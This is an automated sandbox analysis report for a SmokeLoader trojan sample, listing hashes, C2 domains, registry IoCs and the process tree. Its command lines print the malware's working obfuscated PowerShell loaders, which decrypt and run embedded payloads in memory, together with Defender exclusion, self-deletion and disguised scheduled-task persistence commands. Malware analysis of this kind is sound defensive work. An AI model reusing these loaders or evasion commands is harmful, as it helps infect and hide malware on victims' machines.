smokeloader | 683f0358815c8f598b1fe8b537e072a515115da4d2e63fcc6e9ffbf61870d3c0

Resubmissions

19/04/2023, 16:08

230419-tlgy2sbg57 10

19/04/2023, 16:05

230419-tjjpvsbg25 10

Analysis

max time kernel
144s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
19/04/2023, 16:05

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c7e25075b3d4200b1c9ef102c4c32eb2.exe
Size

236KB
MD5

c7e25075b3d4200b1c9ef102c4c32eb2
SHA1

e0ac9316bfd05f46ad7da13526ec2d5b03202046
SHA256

683f0358815c8f598b1fe8b537e072a515115da4d2e63fcc6e9ffbf61870d3c0
SHA512

8c32854ee4aa14ef5ceb249fe37e13d142c3cc0eb0f23dc10a0b95f6598e87eb5fdf97b5d1d101caf0472e0b3899cf0adf4c56bd96048fe3987f8adb6c22a476
SSDEEP

3072:1Xble7H5QnsEQP6MzIM28KFy9XwHUHgG/Nf5/FEWwYPDpJKJRfeI:NleVXEQiMMM28KA9XLgMNhFaYPDWJ

Score

10^/10

smokeloader sprg backdoor trojan

Malware Config

Extracted

Family

smokeloader

Botnet

sprg

Extracted

Family

smokeloader

Version

2022

http://hoh0aeghwugh2gie.com/

http://hie7doodohpae4na.com/

http://aek0aicifaloh1yo.com/

http://yic0oosaeiy7ahng.com/

http://wa5zu7sekai8xeih.com/

rc4.i32

Signatures

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	jim_h6c.cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	FEF1.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	olTsz.bat.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000\Control Panel\International\Geo\Nation	gu4tcbb0.zth.exe

Executes dropped EXE 4 IoCs

pid	Process
632	FEF1.bat.exe
4636	olTsz.bat.exe
2692	gu4tcbb0.zth.exe
2088	jim_h6c.cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7e25075b3d4200b1c9ef102c4c32eb2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7e25075b3d4200b1c9ef102c4c32eb2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	c7e25075b3d4200b1c9ef102c4c32eb2.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2275444769-3691835758-4097679484-1000_Classes\Local Settings	FEF1.bat.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4592	c7e25075b3d4200b1c9ef102c4c32eb2.exe
4592	c7e25075b3d4200b1c9ef102c4c32eb2.exe
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3188	Process not Found

Suspicious behavior: MapViewOfSection 19 IoCs

pid	Process
4592	c7e25075b3d4200b1c9ef102c4c32eb2.exe
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found
3188	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3188	Process not Found
Token: SeCreatePagefilePrivilege	3188	Process not Found
Token: SeDebugPrivilege	632	FEF1.bat.exe
Token: SeShutdownPrivilege	3188	Process not Found
Token: SeCreatePagefilePrivilege	3188	Process not Found
Token: SeDebugPrivilege	1268	powershell.exe
Token: SeDebugPrivilege	4416	powershell.exe
Token: SeShutdownPrivilege	3188	Process not Found
Token: SeCreatePagefilePrivilege	3188	Process not Found
Token: SeDebugPrivilege	3236	powershell.exe
Token: SeIncreaseQuotaPrivilege	3236	powershell.exe
Token: SeSecurityPrivilege	3236	powershell.exe
Token: SeTakeOwnershipPrivilege	3236	powershell.exe
Token: SeLoadDriverPrivilege	3236	powershell.exe
Token: SeSystemProfilePrivilege	3236	powershell.exe
Token: SeSystemtimePrivilege	3236	powershell.exe
Token: SeProfSingleProcessPrivilege	3236	powershell.exe
Token: SeIncBasePriorityPrivilege	3236	powershell.exe
Token: SeCreatePagefilePrivilege	3236	powershell.exe
Token: SeBackupPrivilege	3236	powershell.exe
Token: SeRestorePrivilege	3236	powershell.exe
Token: SeShutdownPrivilege	3236	powershell.exe
Token: SeDebugPrivilege	3236	powershell.exe
Token: SeSystemEnvironmentPrivilege	3236	powershell.exe
Token: SeRemoteShutdownPrivilege	3236	powershell.exe
Token: SeUndockPrivilege	3236	powershell.exe
Token: SeManageVolumePrivilege	3236	powershell.exe
Token: 33	3236	powershell.exe
Token: 34	3236	powershell.exe
Token: 35	3236	powershell.exe
Token: 36	3236	powershell.exe
Token: SeDebugPrivilege	3412	powershell.exe
Token: SeIncreaseQuotaPrivilege	3412	powershell.exe
Token: SeSecurityPrivilege	3412	powershell.exe
Token: SeTakeOwnershipPrivilege	3412	powershell.exe
Token: SeLoadDriverPrivilege	3412	powershell.exe
Token: SeSystemProfilePrivilege	3412	powershell.exe
Token: SeSystemtimePrivilege	3412	powershell.exe
Token: SeProfSingleProcessPrivilege	3412	powershell.exe
Token: SeIncBasePriorityPrivilege	3412	powershell.exe
Token: SeCreatePagefilePrivilege	3412	powershell.exe
Token: SeBackupPrivilege	3412	powershell.exe
Token: SeRestorePrivilege	3412	powershell.exe
Token: SeShutdownPrivilege	3412	powershell.exe
Token: SeDebugPrivilege	3412	powershell.exe
Token: SeSystemEnvironmentPrivilege	3412	powershell.exe
Token: SeRemoteShutdownPrivilege	3412	powershell.exe
Token: SeUndockPrivilege	3412	powershell.exe
Token: SeManageVolumePrivilege	3412	powershell.exe
Token: 33	3412	powershell.exe
Token: 34	3412	powershell.exe
Token: 35	3412	powershell.exe
Token: 36	3412	powershell.exe
Token: SeIncreaseQuotaPrivilege	3412	powershell.exe
Token: SeSecurityPrivilege	3412	powershell.exe
Token: SeTakeOwnershipPrivilege	3412	powershell.exe
Token: SeLoadDriverPrivilege	3412	powershell.exe
Token: SeSystemProfilePrivilege	3412	powershell.exe
Token: SeSystemtimePrivilege	3412	powershell.exe
Token: SeProfSingleProcessPrivilege	3412	powershell.exe
Token: SeIncBasePriorityPrivilege	3412	powershell.exe
Token: SeCreatePagefilePrivilege	3412	powershell.exe
Token: SeBackupPrivilege	3412	powershell.exe
Token: SeRestorePrivilege	3412	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3188 wrote to memory of 3460	3188	Process not Found	91
PID 3188 wrote to memory of 3460	3188	Process not Found	91
PID 3460 wrote to memory of 4768	3460	cmd.exe	93
PID 3460 wrote to memory of 4768	3460	cmd.exe	93
PID 4768 wrote to memory of 632	4768	cmd.exe	95
PID 4768 wrote to memory of 632	4768	cmd.exe	95
PID 4768 wrote to memory of 632	4768	cmd.exe	95
PID 3188 wrote to memory of 2092	3188	Process not Found	96
PID 3188 wrote to memory of 2092	3188	Process not Found	96
PID 3188 wrote to memory of 2092	3188	Process not Found	96
PID 3188 wrote to memory of 2092	3188	Process not Found	96
PID 3188 wrote to memory of 1236	3188	Process not Found	97
PID 3188 wrote to memory of 1236	3188	Process not Found	97
PID 3188 wrote to memory of 1236	3188	Process not Found	97
PID 3188 wrote to memory of 4148	3188	Process not Found	98
PID 3188 wrote to memory of 4148	3188	Process not Found	98
PID 3188 wrote to memory of 4148	3188	Process not Found	98
PID 3188 wrote to memory of 4148	3188	Process not Found	98
PID 3188 wrote to memory of 4876	3188	Process not Found	99
PID 3188 wrote to memory of 4876	3188	Process not Found	99
PID 3188 wrote to memory of 4876	3188	Process not Found	99
PID 3188 wrote to memory of 1740	3188	Process not Found	100
PID 3188 wrote to memory of 1740	3188	Process not Found	100
PID 3188 wrote to memory of 1740	3188	Process not Found	100
PID 3188 wrote to memory of 1740	3188	Process not Found	100
PID 3188 wrote to memory of 4060	3188	Process not Found	101
PID 3188 wrote to memory of 4060	3188	Process not Found	101
PID 3188 wrote to memory of 4060	3188	Process not Found	101
PID 3188 wrote to memory of 4060	3188	Process not Found	101
PID 632 wrote to memory of 1268	632	FEF1.bat.exe	102
PID 632 wrote to memory of 1268	632	FEF1.bat.exe	102
PID 632 wrote to memory of 1268	632	FEF1.bat.exe	102
PID 632 wrote to memory of 4416	632	FEF1.bat.exe	104
PID 632 wrote to memory of 4416	632	FEF1.bat.exe	104
PID 632 wrote to memory of 4416	632	FEF1.bat.exe	104
PID 3188 wrote to memory of 3592	3188	Process not Found	106
PID 3188 wrote to memory of 3592	3188	Process not Found	106
PID 3188 wrote to memory of 3592	3188	Process not Found	106
PID 3188 wrote to memory of 3592	3188	Process not Found	106
PID 3188 wrote to memory of 3884	3188	Process not Found	107
PID 3188 wrote to memory of 3884	3188	Process not Found	107
PID 3188 wrote to memory of 3884	3188	Process not Found	107
PID 3188 wrote to memory of 1188	3188	Process not Found	108
PID 3188 wrote to memory of 1188	3188	Process not Found	108
PID 3188 wrote to memory of 1188	3188	Process not Found	108
PID 3188 wrote to memory of 1188	3188	Process not Found	108
PID 632 wrote to memory of 3236	632	FEF1.bat.exe	109
PID 632 wrote to memory of 3236	632	FEF1.bat.exe	109
PID 632 wrote to memory of 3236	632	FEF1.bat.exe	109
PID 632 wrote to memory of 3412	632	FEF1.bat.exe	111
PID 632 wrote to memory of 3412	632	FEF1.bat.exe	111
PID 632 wrote to memory of 3412	632	FEF1.bat.exe	111
PID 632 wrote to memory of 2948	632	FEF1.bat.exe	113
PID 632 wrote to memory of 2948	632	FEF1.bat.exe	113
PID 632 wrote to memory of 2948	632	FEF1.bat.exe	113
PID 2948 wrote to memory of 3404	2948	WScript.exe	114
PID 2948 wrote to memory of 3404	2948	WScript.exe	114
PID 2948 wrote to memory of 3404	2948	WScript.exe	114
PID 3404 wrote to memory of 4636	3404	cmd.exe	116
PID 3404 wrote to memory of 4636	3404	cmd.exe	116
PID 3404 wrote to memory of 4636	3404	cmd.exe	116
PID 4636 wrote to memory of 3004	4636	olTsz.bat.exe	117
PID 4636 wrote to memory of 3004	4636	olTsz.bat.exe	117
PID 4636 wrote to memory of 3004	4636	olTsz.bat.exe	117

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\c7e25075b3d4200b1c9ef102c4c32eb2.exe
"C:\Users\Admin\AppData\Local\Temp\c7e25075b3d4200b1c9ef102c4c32eb2.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4592

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FEF1.bat" "
1⤵
- Suspicious use of WriteProcessMemory
PID:3460
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\FEF1.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4768
- - C:\Users\Admin\AppData\Local\Temp\FEF1.bat.exe
    "C:\Users\Admin\AppData\Local\Temp\FEF1.bat.exe" -w hidden -c $Yhss='COBPTreaOBPTteOBPTDecOBPTryOBPTptOBPTorOBPT'.Replace('OBPT', '');$CYDS='MOBPTainMOBPToduOBPTlOBPTeOBPT'.Replace('OBPT', '');$Lvkd='TraOBPTnOBPTsfOBPTormOBPTFinOBPTalOBPTBlOBPToOBPTckOBPT'.Replace('OBPT', '');$oRgU='FiOBPTrOBPTstOBPT'.Replace('OBPT', '');$XmlI='SpOBPTlitOBPT'.Replace('OBPT', '');$oNkQ='GeOBPTtCOBPTuOBPTrrOBPTentOBPTPOBPTroOBPTcOBPTesOBPTsOBPT'.Replace('OBPT', '');$ZQpO='EnOBPTtOBPTrOBPTyOBPTPoiOBPTnOBPTtOBPT'.Replace('OBPT', '');$wkxV='ChanOBPTgeEOBPTxteOBPTnsiOBPTonOBPT'.Replace('OBPT', '');$DpWU='LoaOBPTdOBPT'.Replace('OBPT', '');$tmSV='InOBPTvOBPTokOBPTeOBPT'.Replace('OBPT', '');$qrdA='ReadOBPTLiOBPTnesOBPT'.Replace('OBPT', '');$ujLd='FrOBPTomBOBPTasOBPTe64OBPTSOBPTtrOBPTingOBPT'.Replace('OBPT', '');function YwbRc($LbUAF){$VKueZ=[System.Security.Cryptography.Aes]::Create();$VKueZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VKueZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VKueZ.Key=[System.Convert]::$ujLd('W9fChbBVxve7XC6gEtL6ycNU/d+U1Givk93frR5IDQs=');$VKueZ.IV=[System.Convert]::$ujLd('udmMANy4uNJ7yFspg1Rrzw==');$JKnul=$VKueZ.$Yhss();$dzRYO=$JKnul.$Lvkd($LbUAF,0,$LbUAF.Length);$JKnul.Dispose();$VKueZ.Dispose();$dzRYO;}function jClid($LbUAF){$qfZKy=New-Object System.IO.MemoryStream(,$LbUAF);$DgUOH=New-Object System.IO.MemoryStream;$xPkWq=New-Object System.IO.Compression.GZipStream($qfZKy,[IO.Compression.CompressionMode]::Decompress);$xPkWq.CopyTo($DgUOH);$xPkWq.Dispose();$qfZKy.Dispose();$DgUOH.Dispose();$DgUOH.ToArray();}$YiUaM=[System.Linq.Enumerable]::$oRgU([System.IO.File]::$qrdA([System.IO.Path]::$wkxV([System.Diagnostics.Process]::$oNkQ().$CYDS.FileName, $null)));$XdmBJ=$YiUaM.Substring(3).$XmlI(':');$wIgfY=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[0])));$eAKZo=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[1])));[System.Reflection.Assembly]::$DpWU([byte[]]$eAKZo).$ZQpO.$tmSV($null,$null);[System.Reflection.Assembly]::$DpWU([byte[]]$wIgfY).$ZQpO.$tmSV($null,$null);
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:632
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(632);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1268
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4416
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\FEF1')
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3236
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_olTsz' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\olTsz.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3412
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\olTsz.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:2948
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\olTsz.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3404
      - C:\Users\Admin\AppData\Roaming\olTsz.bat.exe
        
        "C:\Users\Admin\AppData\Roaming\olTsz.bat.exe" -w hidden -c $Yhss='COBPTreaOBPTteOBPTDecOBPTryOBPTptOBPTorOBPT'.Replace('OBPT', '');$CYDS='MOBPTainMOBPToduOBPTlOBPTeOBPT'.Replace('OBPT', '');$Lvkd='TraOBPTnOBPTsfOBPTormOBPTFinOBPTalOBPTBlOBPToOBPTckOBPT'.Replace('OBPT', '');$oRgU='FiOBPTrOBPTstOBPT'.Replace('OBPT', '');$XmlI='SpOBPTlitOBPT'.Replace('OBPT', '');$oNkQ='GeOBPTtCOBPTuOBPTrrOBPTentOBPTPOBPTroOBPTcOBPTesOBPTsOBPT'.Replace('OBPT', '');$ZQpO='EnOBPTtOBPTrOBPTyOBPTPoiOBPTnOBPTtOBPT'.Replace('OBPT', '');$wkxV='ChanOBPTgeEOBPTxteOBPTnsiOBPTonOBPT'.Replace('OBPT', '');$DpWU='LoaOBPTdOBPT'.Replace('OBPT', '');$tmSV='InOBPTvOBPTokOBPTeOBPT'.Replace('OBPT', '');$qrdA='ReadOBPTLiOBPTnesOBPT'.Replace('OBPT', '');$ujLd='FrOBPTomBOBPTasOBPTe64OBPTSOBPTtrOBPTingOBPT'.Replace('OBPT', '');function YwbRc($LbUAF){$VKueZ=[System.Security.Cryptography.Aes]::Create();$VKueZ.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VKueZ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VKueZ.Key=[System.Convert]::$ujLd('W9fChbBVxve7XC6gEtL6ycNU/d+U1Givk93frR5IDQs=');$VKueZ.IV=[System.Convert]::$ujLd('udmMANy4uNJ7yFspg1Rrzw==');$JKnul=$VKueZ.$Yhss();$dzRYO=$JKnul.$Lvkd($LbUAF,0,$LbUAF.Length);$JKnul.Dispose();$VKueZ.Dispose();$dzRYO;}function jClid($LbUAF){$qfZKy=New-Object System.IO.MemoryStream(,$LbUAF);$DgUOH=New-Object System.IO.MemoryStream;$xPkWq=New-Object System.IO.Compression.GZipStream($qfZKy,[IO.Compression.CompressionMode]::Decompress);$xPkWq.CopyTo($DgUOH);$xPkWq.Dispose();$qfZKy.Dispose();$DgUOH.Dispose();$DgUOH.ToArray();}$YiUaM=[System.Linq.Enumerable]::$oRgU([System.IO.File]::$qrdA([System.IO.Path]::$wkxV([System.Diagnostics.Process]::$oNkQ().$CYDS.FileName, $null)));$XdmBJ=$YiUaM.Substring(3).$XmlI(':');$wIgfY=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[0])));$eAKZo=jClid (YwbRc ([Convert]::$ujLd($XdmBJ[1])));[System.Reflection.Assembly]::$DpWU([byte[]]$eAKZo).$ZQpO.$tmSV($null,$null);[System.Reflection.Assembly]::$DpWU([byte[]]$wIgfY).$ZQpO.$tmSV($null,$null);
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:4636
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(4636);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        7⤵
        
        PID:3004
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
        7⤵
        
        PID:3792
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\olTsz')
        7⤵
        
        PID:2176
        
        C:\Users\Admin\AppData\Local\Temp\gu4tcbb0.zth.exe
        
        "C:\Users\Admin\AppData\Local\Temp\gu4tcbb0.zth.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2692
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000003021\jim_h6c.cmd" "
        8⤵
        
        PID:3776
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\1000003021\jim_h6c.cmd"
        9⤵
        
        PID:1780
        
        C:\Users\Admin\AppData\Local\Temp\1000003021\jim_h6c.cmd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000003021\jim_h6c.cmd.exe" -w hidden -c $Pixo='EnuCYKtryuCYKPuCYKouCYKintuCYK'.Replace('uCYK', '');$obKW='MauCYKinMouCYKduCYKuluCYKeuCYK'.Replace('uCYK', '');$ogoY='FrouCYKmBauCYKsuCYKe6uCYK4SuCYKtruCYKinguCYK'.Replace('uCYK', '');$udiT='FiuCYKrsuCYKtuCYK'.Replace('uCYK', '');$yBOz='LoauCYKduCYK'.Replace('uCYK', '');$ftDo='SpluCYKiuCYKtuCYK'.Replace('uCYK', '');$BTHz='ReuCYKaduCYKLuCYKinuCYKesuCYK'.Replace('uCYK', '');$tDna='TrauCYKnsfouCYKrmFuCYKinuCYKaluCYKBluCYKocuCYKkuCYK'.Replace('uCYK', '');$NObW='ChauCYKnguCYKeEuCYKxuCYKtuCYKenuCYKsiouCYKnuCYK'.Replace('uCYK', '');$ebJA='InvuCYKokeuCYK'.Replace('uCYK', '');$CXVG='CruCYKeuCYKatuCYKeDeuCYKcuCYKryptuCYKoruCYK'.Replace('uCYK', '');$vpdN='GeuCYKtuCYKCuruCYKreuCYKnuCYKtPuCYKruCYKocuCYKessuCYK'.Replace('uCYK', '');function NnTAG($zkfXG){$OiAVg=[System.Security.Cryptography.Aes]::Create();$OiAVg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OiAVg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OiAVg.Key=[System.Convert]::$ogoY('90U7nuHPXu/Bj2cbdGeeOao1R3RjA29fADj3gMSsqOE=');$OiAVg.IV=[System.Convert]::$ogoY('PZmPwZN1TrX8QA1tlJQZvQ==');$dvQOF=$OiAVg.$CXVG();$zuYOQ=$dvQOF.$tDna($zkfXG,0,$zkfXG.Length);$dvQOF.Dispose();$OiAVg.Dispose();$zuYOQ;}function xuFFu($zkfXG){$JnqCm=New-Object System.IO.MemoryStream(,$zkfXG);$oYUND=New-Object System.IO.MemoryStream;$WpApI=New-Object System.IO.Compression.GZipStream($JnqCm,[IO.Compression.CompressionMode]::Decompress);$WpApI.CopyTo($oYUND);$WpApI.Dispose();$JnqCm.Dispose();$oYUND.Dispose();$oYUND.ToArray();}$bkmkk=[System.Linq.Enumerable]::$udiT([System.IO.File]::$BTHz([System.IO.Path]::$NObW([System.Diagnostics.Process]::$vpdN().$obKW.FileName, $null)));$czIEd=$bkmkk.Substring(3).$ftDo(':');$WabtR=xuFFu (NnTAG ([Convert]::$ogoY($czIEd[0])));$UNwpe=xuFFu (NnTAG ([Convert]::$ogoY($czIEd[1])));[System.Reflection.Assembly]::$yBOz([byte[]]$UNwpe).$Pixo.$ebJA($null,$null);[System.Reflection.Assembly]::$yBOz([byte[]]$WabtR).$Pixo.$ebJA($null,$null);
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2088
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2088);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
        11⤵
        
        PID:2220
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
        11⤵
        
        PID:1420
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\1000003021\jim_h6c')
        11⤵
        
        PID:2884
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_bMcWu' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\bMcWu.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        11⤵
        
        PID:4228
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\bMcWu.vbs"
        11⤵
        
        PID:1448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\bMcWu.bat" "
        12⤵
        
        PID:2192
        
        C:\Users\Admin\AppData\Roaming\bMcWu.bat.exe
        
        "C:\Users\Admin\AppData\Roaming\bMcWu.bat.exe" -w hidden -c $Pixo='EnuCYKtryuCYKPuCYKouCYKintuCYK'.Replace('uCYK', '');$obKW='MauCYKinMouCYKduCYKuluCYKeuCYK'.Replace('uCYK', '');$ogoY='FrouCYKmBauCYKsuCYKe6uCYK4SuCYKtruCYKinguCYK'.Replace('uCYK', '');$udiT='FiuCYKrsuCYKtuCYK'.Replace('uCYK', '');$yBOz='LoauCYKduCYK'.Replace('uCYK', '');$ftDo='SpluCYKiuCYKtuCYK'.Replace('uCYK', '');$BTHz='ReuCYKaduCYKLuCYKinuCYKesuCYK'.Replace('uCYK', '');$tDna='TrauCYKnsfouCYKrmFuCYKinuCYKaluCYKBluCYKocuCYKkuCYK'.Replace('uCYK', '');$NObW='ChauCYKnguCYKeEuCYKxuCYKtuCYKenuCYKsiouCYKnuCYK'.Replace('uCYK', '');$ebJA='InvuCYKokeuCYK'.Replace('uCYK', '');$CXVG='CruCYKeuCYKatuCYKeDeuCYKcuCYKryptuCYKoruCYK'.Replace('uCYK', '');$vpdN='GeuCYKtuCYKCuruCYKreuCYKnuCYKtPuCYKruCYKocuCYKessuCYK'.Replace('uCYK', '');function NnTAG($zkfXG){$OiAVg=[System.Security.Cryptography.Aes]::Create();$OiAVg.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OiAVg.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OiAVg.Key=[System.Convert]::$ogoY('90U7nuHPXu/Bj2cbdGeeOao1R3RjA29fADj3gMSsqOE=');$OiAVg.IV=[System.Convert]::$ogoY('PZmPwZN1TrX8QA1tlJQZvQ==');$dvQOF=$OiAVg.$CXVG();$zuYOQ=$dvQOF.$tDna($zkfXG,0,$zkfXG.Length);$dvQOF.Dispose();$OiAVg.Dispose();$zuYOQ;}function xuFFu($zkfXG){$JnqCm=New-Object System.IO.MemoryStream(,$zkfXG);$oYUND=New-Object System.IO.MemoryStream;$WpApI=New-Object System.IO.Compression.GZipStream($JnqCm,[IO.Compression.CompressionMode]::Decompress);$WpApI.CopyTo($oYUND);$WpApI.Dispose();$JnqCm.Dispose();$oYUND.Dispose();$oYUND.ToArray();}$bkmkk=[System.Linq.Enumerable]::$udiT([System.IO.File]::$BTHz([System.IO.Path]::$NObW([System.Diagnostics.Process]::$vpdN().$obKW.FileName, $null)));$czIEd=$bkmkk.Substring(3).$ftDo(':');$WabtR=xuFFu 